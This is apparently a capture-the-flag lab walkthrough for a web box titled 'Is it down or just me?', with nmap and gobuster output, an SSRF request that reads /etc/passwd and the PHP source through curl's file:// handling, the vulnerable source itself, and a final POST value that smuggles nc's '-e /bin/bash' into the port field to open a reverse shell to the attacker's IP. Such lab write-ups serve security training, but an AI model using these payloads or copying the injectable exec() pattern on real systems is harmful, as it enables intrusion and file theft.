# Victim IP ``` 10.129.39.124 ``` # Attacker IP ``` 10.10.14.191 ``` # Nmap ``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 f6:cc:21:7c:ca:da:ed:34:fd:04:ef:e6:f9:4c:dd:f8 (ECDSA) |_ 256 fa:06:1f:f4:bf:8c:e3:b0:c8:40:21:0d:57:06:dd:11 (ED25519) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Is it down or just me? |_http-server-header: Apache/2.4.52 (Ubuntu) 3190/tcp filtered csvr-proxy 3329/tcp filtered hp-device-disc 4285/tcp filtered vrml-multi-use 4680/tcp filtered mgemanagement 4967/tcp filtered unknown 6336/tcp filtered unknown 7753/tcp filtered unknown 8999/tcp filtered bctp 10362/tcp filtered unknown 11051/tcp filtered unknown 11600/tcp filtered tempest-port 11903/tcp filtered unknown 12708/tcp filtered unknown 13199/tcp filtered unknown 15078/tcp filtered unknown 16140/tcp filtered unknown 17153/tcp filtered unknown 17609/tcp filtered unknown 25119/tcp filtered unknown 34475/tcp filtered unknown 35375/tcp filtered unknown 39696/tcp filtered unknown 40259/tcp filtered unknown 41464/tcp filtered unknown 44320/tcp filtered unknown 46811/tcp filtered unknown 49334/tcp filtered unknown 51690/tcp filtered unknown 54014/tcp filtered unknown 54250/tcp filtered unknown 59865/tcp filtered unknown 61349/tcp filtered unknown 62024/tcp filtered unknown 63662/tcp filtered unknown 65417/tcp filtered unknown Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel NSE: Script Post-scanning. Initiating NSE at 16:30 Completed NSE at 16:30, 0.00s elapsed Initiating NSE at 16:30 Completed NSE at 16:30, 0.00s elapsed Initiating NSE at 16:30 Completed NSE at 16:30, 0.00s elapsed Read data files from: /usr/share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 590.06 seconds Raw packets sent: 72586 (3.194MB) | Rcvd: 70925 (2.889MB) ``` does not have internet connection but can use http / https addresses have SSRF attack running in burpsuite tried other forms such as file:// but got an error about to run gobuster for directery / file enum # Gobuster ``` =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.129.39.124 [+] Method: GET [+] Threads: 100 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: php [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /javascript (Status: 301) [Size: 319] [--> http://10.129.39.124/javascript/] /index.php (Status: 200) [Size: 739] /server-status (Status: 403) [Size: 278] Progress: 47937 / 60000 (79.89%)[ERROR] parse "http://10.129.39.124/error\x1f_log": net/url: invalid control character in URL [ERROR] parse "http://10.129.39.124/error\x1f_log.php": net/url: invalid control character in URL Progress: 59998 / 60000 (100.00%) =============================================================== Finished =============================================================== ``` nothing of interest by requesting ``` http://+file%3a///etc/passwd ``` as the url parameter in the post request we can get the output of /etc/passwd where we discover the user `aleks` login shell is `/bin/bash` Was able to disclose index.php by requesting `http:// file:///var/www/html/index.php` url encoded ofc and got this source code back after html decoding it ```php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Is it down or just me?</title> <link rel="stylesheet" href="style.css"> </head> <body> <header> <img src="/logo.png" alt="Logo"> <h2>Is it down or just me?</h2> </header> <div class="container"> <?php if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) { echo '<h1>Is the port refused, or is it just you?</h1> <form id="urlForm" action="index.php?expertmode=tcp" method="POST"> <input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br> <input type="number" id="port" name="port" placeholder="Please enter a port number." required><br> <button type="submit">Is it refused?</button> </form>'; } else { echo '<h1>Is that website down, or is it just you?</h1> <form id="urlForm" action="index.php" method="POST"> <input type="url" id="url" name="url" placeholder="Please enter a URL." required><br> <button type="submit">Is it down?</button> </form>'; } if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' && isset($_POST['ip']) && isset($_POST['port']) ) { $ip = trim($_POST['ip']); $valid_ip = filter_var($ip, FILTER_VALIDATE_IP); $port = trim($_POST['port']); $port_int = intval($port); $valid_port = filter_var($port_int, FILTER_VALIDATE_INT); if ( $valid_ip && $valid_port ) { $rc = 255; $output = ''; $ec = escapeshellcmd("/usr/bin/nc -vz $ip $port"); exec($ec . " 2>&1",$output,$rc); echo '<div class="output" id="outputSection">'; if ( $rc === 0 ) { echo "<font size=+1>It is up. It's just you! 😝</font><br><br>"; echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>'; } else { echo "<font size=+1>It is down for everyone! 😔</font><br><br>"; echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>'; } } else { echo '<div class="output" id="outputSection">'; echo '<font color=red size=+1>Please specify a correct IP and a port between 1 and 65535.</font>'; } } elseif (isset($_POST['url'])) { $url = trim($_POST['url']); if ( preg_match('|^https?://|',$url) ) { $rc = 255; $output = ''; $ec = escapeshellcmd("/usr/bin/curl -s $url"); exec($ec . " 2>&1",$output,$rc); echo '<div class="output" id="outputSection">'; if ( $rc === 0 ) { echo "<font size=+1>It is up. It's just you! 😝</font><br><br>"; echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>'; } else { echo "<font size=+1>It is down for everyone! 😔</font><br><br>"; } } else { echo '<div class="output" id="outputSection">'; echo '<font color=red size=+1>Only protocols http or https allowed.</font>'; } } ?> </div> </div> <footer>© 2024 isitdownorjustme LLC</footer> </body> </html> ``` ```php <?php if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) { echo '<h1>Is the port refused, or is it just you?</h1> <form id="urlForm" action="index.php?expertmode=tcp" method="POST"> <input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br> <input type="number" id="port" name="port" placeholder="Please enter a port number." required><br> <button type="submit">Is it refused?</button> </form>'; } else { echo '<h1>Is that website down, or is it just you?</h1> <form id="urlForm" action="index.php" method="POST"> <input type="url" id="url" name="url" placeholder="Please enter a URL." required><br> <button type="submit">Is it down?</button> </form>'; } ``` stands out as it's looking for a get parameter of expertmode with the value of tcp to show a new form bypassed filter on expertmode to get reverse shell ``` ip=10.10.14.191&port=1337 -e /bin/bash ```